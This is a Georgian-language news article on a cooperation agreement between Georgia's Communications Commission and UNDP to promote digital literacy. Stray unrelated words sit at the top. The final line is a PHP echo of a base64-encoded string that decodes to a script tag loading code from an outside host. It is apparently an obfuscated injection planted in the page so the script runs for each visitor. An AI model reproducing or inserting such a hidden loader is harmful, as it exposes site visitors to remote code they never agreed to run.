celsiusi
ავერსი შნაიდერი

კომუნიკაციების კომისიასა და გაერო-ს განვითარების პროგრამას (UNDP) შორის გაფორმდა ურთიერთთანამშრომლობის შეთანხმება, რომელსაც ხელი ComCom-ის წევრმა, ნათია კუკულაძემ და საქართველოში​ UNDP-ის მუდმივი წარმომადგენლის მოადგილემ, ანნა ჩერნიშოვამ მოაწერეს.

კომუნიკაციების კომისიის ცნობით, თანამშრომლობის მიზანს საზოგადოებაში ციფრული ეკონომიკის პოტენციალის გამოყენების ხელშეწყობა წარმოადგენს.

შეთანხმების ფარგლებში, დაიგეგმება ერთობლივი აქტივობები ციფრული წიგნიერების დონის ამაღლების მიზნით, მათ შორის: ციფრული უთანასწორობის შემცირების, ციფრული ეკონომიკის პოტენციალის ათვისების, ასევე, ელექტრონული სერვისების გამოყენების გავრცელებისა და საზოგადოებაში ციფრული წიგნიერების უნარების გაუმჯობესების მიმართულებით.

კომუნიკაციების კომისიისთვის საზოგადოებაში ინტერნეტის გამოყენების ხელშეწყობა და ციფრული უთანასწორობის შემცირება უმნიშვნელოვანესია.

295
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");